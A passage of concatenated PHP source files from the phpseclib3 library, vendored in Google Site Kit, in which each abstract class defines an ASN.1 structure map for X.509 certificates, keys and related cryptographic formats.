PKCS9String * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PKCS9String { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_CHOICE, 'children' => ['ia5String' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_IA5_STRING], 'directoryString' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DirectoryString::MAP]]; } <?php /** * FieldElement * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * FieldElement * * @author Jim Wigginton <terrafrost@php.net> */ abstract class FieldElement { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OCTET_STRING]; } <?php /** * PrivateKey * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PrivateKey * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PrivateKey { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OCTET_STRING]; } <?php /** * EncryptedPrivateKeyInfo * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * EncryptedPrivateKeyInfo * * @author Jim Wigginton <terrafrost@php.net> */ abstract class EncryptedPrivateKeyInfo { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['encryptionAlgorithm' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP, 'encryptedData' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\EncryptedData::MAP]]; } <?php /** * DistributionPointName * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * DistributionPointName * * @author Jim Wigginton <terrafrost@php.net> */ abstract class DistributionPointName { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_CHOICE, 'children' => ['fullName' => ['constant' => 0, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\GeneralNames::MAP, 'nameRelativeToCRLIssuer' => ['constant' => 1, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\RelativeDistinguishedName::MAP]]; } <?php /** * CPSuri * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * CPSuri * * @author Jim Wigginton <terrafrost@php.net> */ abstract class CPSuri { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_IA5_STRING]; } <?php /** * HashAglorithm * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; /** * HashAglorithm * * @author Jim Wigginton <terrafrost@php.net> */ abstract class HashAlgorithm { const MAP = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP; } <?php /** * PolicyMappings * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PolicyMappings * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PolicyMappings { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['issuerDomainPolicy' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CertPolicyId::MAP, 'subjectDomainPolicy' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CertPolicyId::MAP]]]; } <?php /** * OneAsymmetricKey * * See https://tools.ietf.org/html/rfc5958 * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * OneAsymmetricKey * * @author Jim Wigginton <terrafrost@php.net> */ abstract class OneAsymmetricKey { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['version' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER, 'mapping' => ['v1', 'v2']], 'privateKeyAlgorithm' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP, 'privateKey' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PrivateKey::MAP, 'attributes' => ['constant' => 0, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Attributes::MAP, 'publicKey' => ['constant' => 1, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PublicKey::MAP]]; } <?php /** * DssSigValue * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * DssSigValue * * @author Jim Wigginton <terrafrost@php.net> */ abstract class DssSigValue { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['r' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], 's' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER]]]; } <?php /** * Trinomial * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * Trinomial * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Trinomial { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER]; } <?php /** * DSAPrivateKey * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * DSAPrivateKey * * @author Jim Wigginton <terrafrost@php.net> */ abstract class DSAPrivateKey { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['version' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], 'p' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], 'q' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], 'g' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], 'y' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], 'x' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER]]]; } <?php /** * OtherPrimeInfo * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * OtherPrimeInfo * * @author Jim Wigginton <terrafrost@php.net> */ abstract class OtherPrimeInfo { // version must be multi if otherPrimeInfos present const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => [ 'prime' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], // ri 'exponent' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], // di 'coefficient' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], ]]; } <?php /** * Characteristic_two * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * Characteristic_two * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Characteristic_two { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => [ 'm' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], // field size 2**m 'basis' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OBJECT_IDENTIFIER], 'parameters' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_ANY, 'optional' => \true], ]]; } <?php /** * netscape_comment * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * netscape_comment * * @author Jim Wigginton <terrafrost@php.net> */ abstract class netscape_comment { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_IA5_STRING]; } <?php /** * SubjectInfoAccessSyntax * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * SubjectInfoAccessSyntax * * @author Jim Wigginton <terrafrost@php.net> */ abstract class SubjectInfoAccessSyntax { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AccessDescription::MAP]; } <?php /** * KeyUsage * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * KeyUsage * * @author Jim Wigginton <terrafrost@php.net> */ abstract class KeyUsage { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BIT_STRING, 'mapping' => ['digitalSignature', 'nonRepudiation', 'keyEncipherment', 'dataEncipherment', 'keyAgreement', 'keyCertSign', 'cRLSign', 'encipherOnly', 'decipherOnly']]; } <?php /** * AlgorithmIdentifier * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * AlgorithmIdentifier * * @author Jim Wigginton <terrafrost@php.net> */ abstract class AlgorithmIdentifier { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['algorithm' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OBJECT_IDENTIFIER], 'parameters' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_ANY, 'optional' => \true]]]; } <?php /** * AccessDescription * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * AccessDescription * * @author Jim Wigginton <terrafrost@php.net> */ abstract class AccessDescription { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['accessMethod' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OBJECT_IDENTIFIER], 'accessLocation' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\GeneralName::MAP]]; } <?php /** * NetworkAddress * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * NetworkAddress * * @author Jim Wigginton <terrafrost@php.net> */ abstract class NetworkAddress { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_NUMERIC_STRING]; } <?php /** * PublicKeyInfo * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PublicKeyInfo * * this format is not formally defined anywhere but is none-the-less the form you * get when you do "openssl rsa -in private.pem -outform PEM -pubout" * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PublicKeyInfo { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['publicKeyAlgorithm' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP, 'publicKey' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BIT_STRING]]]; } <?php /** * NameConstraints * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * NameConstraints * * @author Jim Wigginton <terrafrost@php.net> */ abstract class NameConstraints { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['permittedSubtrees' => ['constant' => 0, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\GeneralSubtrees::MAP, 'excludedSubtrees' => ['constant' => 1, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\GeneralSubtrees::MAP]]; } <?php /** * PrivateKeyUsagePeriod * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PrivateKeyUsagePeriod * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PrivateKeyUsagePeriod { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['notBefore' => ['constant' => 0, 'optional' => \true, 'implicit' => \true, 'type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_GENERALIZED_TIME], 'notAfter' => ['constant' => 1, 'optional' => \true, 'implicit' => \true, 'type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_GENERALIZED_TIME]]]; } <?php /** * AdministrationDomainName * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * AdministrationDomainName * * @author Jim Wigginton <terrafrost@php.net> */ abstract class AdministrationDomainName { const MAP = [ 'type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_CHOICE, // if class isn't present it's assumed to be \phpseclib3\File\ASN1::CLASS_UNIVERSAL or // (if constant is present) \phpseclib3\File\ASN1::CLASS_CONTEXT_SPECIFIC 'class' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::CLASS_APPLICATION, 'cast' => 2, 'children' => ['numeric' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_NUMERIC_STRING], 'printable' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_PRINTABLE_STRING]], ]; } <?php /** * GeneralSubtree * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * GeneralSubtree * * @author Jim Wigginton <terrafrost@php.net> */ abstract class GeneralSubtree { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['base' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\GeneralName::MAP, 'minimum' => ['constant' => 0, 'optional' => \true, 'implicit' => \true, 'default' => '0'] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\BaseDistance::MAP, 'maximum' => ['constant' => 1, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\BaseDistance::MAP]]; } <?php /** * Certificate * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * Certificate * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Certificate { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['tbsCertificate' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\TBSCertificate::MAP, 'signatureAlgorithm' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP, 'signature' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BIT_STRING]]]; } <?php /** * UserNotice * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * UserNotice * * @author Jim Wigginton <terrafrost@php.net> */ abstract class UserNotice { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['noticeRef' => ['optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\NoticeReference::MAP, 'explicitText' => ['optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DisplayText::MAP]]; } <?php /** * GeneralName * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * GeneralName * * @author Jim Wigginton <terrafrost@php.net> */ abstract class GeneralName { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_CHOICE, 'children' => ['otherName' => ['constant' => 0, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AnotherName::MAP, 'rfc822Name' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_IA5_STRING, 'constant' => 1, 'optional' => \true, 'implicit' => \true], 'dNSName' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_IA5_STRING, 'constant' => 2, 'optional' => \true, 'implicit' => \true], 'x400Address' => ['constant' => 3, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ORAddress::MAP, 'directoryName' => ['constant' => 4, 'optional' => \true, 'explicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Name::MAP, 'ediPartyName' => ['constant' => 5, 'optional' => \true, 'implicit' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\EDIPartyName::MAP, 'uniformResourceIdentifier' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_IA5_STRING, 'constant' => 6, 'optional' => \true, 'implicit' => \true], 'iPAddress' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OCTET_STRING, 'constant' => 7, 'optional' => \true, 'implicit' => \true], 'registeredID' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OBJECT_IDENTIFIER, 'constant' => 8, 'optional' => \true, 'implicit' => \true]]]; } <?php /** * RelativeDistinguishedName * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * RelativeDistinguishedName * * In practice, RDNs containing multiple name-value pairs (called "multivalued RDNs") are rare, * but they can be useful at times when either there is no unique attribute in the entry or you * want to ensure that the entry's DN contains some useful identifying information. * * - https://www.opends.org/wiki/page/DefinitionRelativeDistinguishedName * * @author Jim Wigginton <terrafrost@php.net> */ abstract class RelativeDistinguishedName { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SET, 'min' => 1, 'max' => -1, 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AttributeTypeAndValue::MAP]; } <?php /** * ExtensionAttribute * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * ExtensionAttribute * * @author Jim Wigginton <terrafrost@php.net> */ abstract class ExtensionAttribute { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['extension-attribute-type' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_PRINTABLE_STRING, 'constant' => 0, 'optional' => \true, 'implicit' => \true], 'extension-attribute-value' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_ANY, 'constant' => 1, 'optional' => \true, 'explicit' => \true]]]; } <?php /** * PolicyQualifierInfo * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PolicyQualifierInfo * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PolicyQualifierInfo { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['policyQualifierId' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PolicyQualifierId::MAP, 'qualifier' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_ANY]]]; } <?php /** * PublicKey * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PublicKey * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PublicKey { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BIT_STRING]; } <?php /** * AttributeType * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * AttributeType * * @author Jim Wigginton <terrafrost@php.net> */ abstract class AttributeType { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OBJECT_IDENTIFIER]; } <?php /** * PBKDF2params * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PBKDF2params * * from https://tools.ietf.org/html/rfc2898#appendix-A.3 * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PBKDF2params { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => [ // technically, this is a CHOICE in RFC2898 but the other "choice" is, currently, more of a placeholder // in the RFC 'salt' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OCTET_STRING], 'iterationCount' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], 'keyLength' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER, 'optional' => \true], 'prf' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP + ['optional' => \true], ]]; } <?php /** * ORAddress * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * ORAddress * * @author Jim Wigginton <terrafrost@php.net> */ abstract class ORAddress { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['built-in-standard-attributes' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\BuiltInStandardAttributes::MAP, 'built-in-domain-defined-attributes' => ['optional' => \true] + 